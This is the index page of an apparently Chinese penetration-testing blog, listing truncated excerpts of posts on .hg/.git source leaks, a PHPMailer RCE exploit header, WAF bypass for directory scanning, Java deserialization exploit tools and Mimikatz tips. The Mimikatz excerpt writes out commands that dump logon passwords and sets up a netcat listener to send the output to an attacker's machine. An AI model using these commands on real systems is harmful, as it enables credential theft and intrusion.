常见Web源码泄露总结

分类:安全 | 2017-02-13 | 撸过 208 次
0人扯谈

背景

本文主要是记录一下常见的源码泄漏问题,这些经常在web渗透测试以及CTF中出现。

 

.hg源码泄漏

漏洞成因:
 
hg init的时候会生成.hg

e.g.http://www.example.com/.hg/

漏洞利用:
 
工具: dvcs-ripper

rip-hg.pl -v -u http://www.example.com/.hg/

.git源码泄漏

漏洞成因:
 
在运行git init初始化代码库的时候,会在当前目录下面产生一个.git的隐藏文件,用来记录代码的变更记录等等。在发布代码的时候,把[……]

继续阅读

Layer子域名挖掘机4.2纪念版 增加功能

分类:工具 | 2017-02-6 | 撸过 239 次
0人扯谈

更新内容如下:

1、降级.NET版本至4.0,因之前有人反馈WIN2003无法使用,因为2003不能安装.NET4.5,现在win2003及XP都可以正常使用。

2、增加获取web服务器信息的功能,如果在渗透过程中,担心软件自动访问web服务器会记录到web日志,可以关闭获取WEB服务器信息功能,但是如果干特别大的坏事,人家还是可以通过运营商的渠道来抓你。

3、增加线程控制,因有不少人反馈,开全速的时候,他们的小电脑会卡死,反正我电脑跑起来妥妥的,所以默认设置为全速。

4、增加右键复制所选项,胖子硬提出的需求。

5、修复了一个线程锁的问题,没修复前会引起程序崩溃。[……]

继续阅读

免费Zend 5.2 5.3 5.4解密工具

分类:工具 | 2017-02-6 | 撸过 224 次
1人扯谈

最近在读一些有zend 5.4加密的代码,之前的黑刀无法解密5.4,网上找了下发现大多要收费,有一个工具叫G-DeZender能解5.4,但是未付费版本每点一次只能解密一个文件,这TM四五千个文件点完会死人的。

丢给公司的小莫同志研究了下,抓了下这个程序的进程,发现这个程序也是调用的本地文件去解密,那直接写个循环调用不就完了。。。

花了点时间抄了个SeayDzend,支持zend 5.2,zend5.3,zend5.4 的解密,造福下大众,

 
[……]

继续阅读

PentestBox简明使用教程

分类:安全 | 2017-02-4 | 撸过 180 次
0人扯谈

0x01介绍

PentestBox:渗透测试盒子 顾名思义,这是一个渗透工具包,但是不同于绝大多数国内xx工具包的是,这里集成的大都是Linux下的工具,Kali Linux上面的常用的很多工具这里面也都集成了。

PentestBox官网:https://pentestbox.org/zh/

官方的介绍如下:

PentestBox是一款Windows平台下预配置的便携式开源渗透测试环境

为什么又有一个渗透测试环境?

PentestBox不同于运行在虚拟机或者双启动环境的Linux渗透测试发行版。

它打包了所有的安全工具,并且可以在Windows系统中原生地[……]

继续阅读

PHPMailer < 5.2.18 - Remote Code Execution (PHP)

分类:安全 | 2017-01-13 | 撸过 304 次
0人扯谈

<?php
/*
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
Discovered/Coded by:
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
A simple PoC (working on[......]

继续阅读

扫目录过狗过waf方法

分类:安全 | 2016-12-8 | 撸过 1,027 次
1人扯谈

用御剑的朋友都遇到过这个页面吧,装狗了开启保护就会这样

本机搭建安全狗设置发现,默认是过蜘蛛的,所以只要把http头来路改成蜘蛛的useragent就ok了

无奈御剑和wscan 都是无法设置http头的,也无法用burp做代理中转改http头

像AWVS,Burp类大型扫描工具也可以进行目录扫描,并且也可以挂代理,改http头,不过个人感觉远没有专业扫描工具来的简单

因此翻出一款老工具

DirBuster是Owasp(开放Web软体安全项目- Open Web Application Security Project )开发的一款专门用于探测Web服务器[……]

继续阅读

PentestBox 一款Windows平台开源渗透测试

分类:安全 | 2016-12-6 | 撸过 620 次
0人扯谈

PentestBox是一款Windows平台下预配置的便携式开源渗透测试环境为什么又有一个渗透测试环境?

PentestBox不同于运行在虚拟机或者双启动环境的Linux渗透测试发行版。它打包了所有的安全工具,并且可以在Windows系统中原生地运行,有效地降低了对虚拟机或者双启动环境的需求。我们发现超过50%的渗透测试发行版是运行在Windows系统下的虚拟机程序中,这激发我们创造了它。

[ 源代码]

特性

易于使用

只是一个简单的命令行工具。group设计简洁

不同于传统的绿字黑色背景终端。flash_on性能卓越

直接运行在主机上而不依赖于虚拟机[……]

继续阅读

星外虚拟主机跨web目录文件读取技巧

分类:安全 | 2016-11-7 | 撸过 826 次
0人扯谈

星外虚拟主机跨目录读取文件漏洞,需要一定条件。

详细说明:

问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:

c:\windows\7i24IISLOG.exe
 
c:\windows\7i24IISLOG2.exe
 
c:\windows\7i24IISLOG3.exe
 
c:\windows\7i24IISLOG4.exe
 
c:\windows\7i24tool.exe
 
c:\windows\rsb.exe

其中的7i24IISLOG.exe其实就是LogParser,LogParser是一[……]

继续阅读

Java反序列化利用工具 — Java Deserialization Exp Tools

分类:工具 | 2016-11-5 | 撸过 2,049 次
1人扯谈

Java反序列化漏洞已经被曝出一段时间了,本人参考了网上大神的放出来的工具,将Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。FreeBuf上已经公开了JBoss反序列化执行命令回显的工具,在本文中就不多做叙述了。其实,WebSphere的利用过程也和JBoss差不多,只不过在发送Payload和解析结果的时候多了个Base64编码(解码)的过程。
本工具暂时支持的功能:
1、本地命令执行并回显,无须加载外部jar包,支持纯内网环境检测。
2、支持JBoss、WebSphere和Weblogic的反序列化漏洞检测。
3、支持https数据传输。
4、[……]

继续阅读

Mimikatz 使用小技巧

分类:安全 | 2016-10-6 | 撸过 1,200 次
0人扯谈

1.记录 Mimikatz输出:

C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

2.将输出导入到本地文件:

C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

3.将输出传输到远程机器:
Attacker执行:

E:\>nc -lvp 4444

Victim执行:

C:\>mi[......]

继续阅读

第 1 页,共 69 页12345...102030...最旧 »